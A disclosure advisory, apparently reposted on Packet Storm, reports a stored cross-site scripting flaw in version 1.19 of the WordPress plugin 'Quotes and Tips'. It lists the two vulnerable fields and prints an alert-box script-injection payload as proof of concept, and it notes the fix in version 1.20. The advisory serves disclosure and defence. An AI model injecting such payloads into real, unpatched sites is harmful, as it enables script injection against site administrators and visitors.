WordPress Quotes and Tips plugin version 1.19 suffers from a cross site scripting vulnerability.
e5d4afa9ded7997863867d543a78755ed2051f542b899348fe36e1ec76c7b86cPlugin Name : Quotes and Tips
Effected Version : 1.19 (and most probably lower version's if any)
Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Madhu Akula
Technical Details
Minimum Level of Access Required : Administrator
PoC - (Proof of Concept) :
The following fields put the payload as below
http://localhost/wp-admin/admin.php?page=quotes-and-tips.php
qtsndtps_tip_label = “><script>alert(1)</script>
qtsndtps_quote_label = “><script>alert(2)</script>
Vulnerable Parameter : qtsndtps_tip_label, qtsndtps_quote_label
Type of XSS : Stored
Fixed in : 1.20
http://wordpress.org/plugins/quotes-and-tips/changelog/
Disclosure Timeline
Vendor Contacted : 2014-08-04
Plugin Status : Updated on 2014-08-07
Public Disclosure : October 3, 2015
CVE Number : Not assigned yet
Plugin Description :
This plugin allows you to create and publish quotes of your customers about your work and helpful tips for the website visitors. Imagine that now on now your satisfied customers will help to promote business. Moreover, it is very simple in using.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed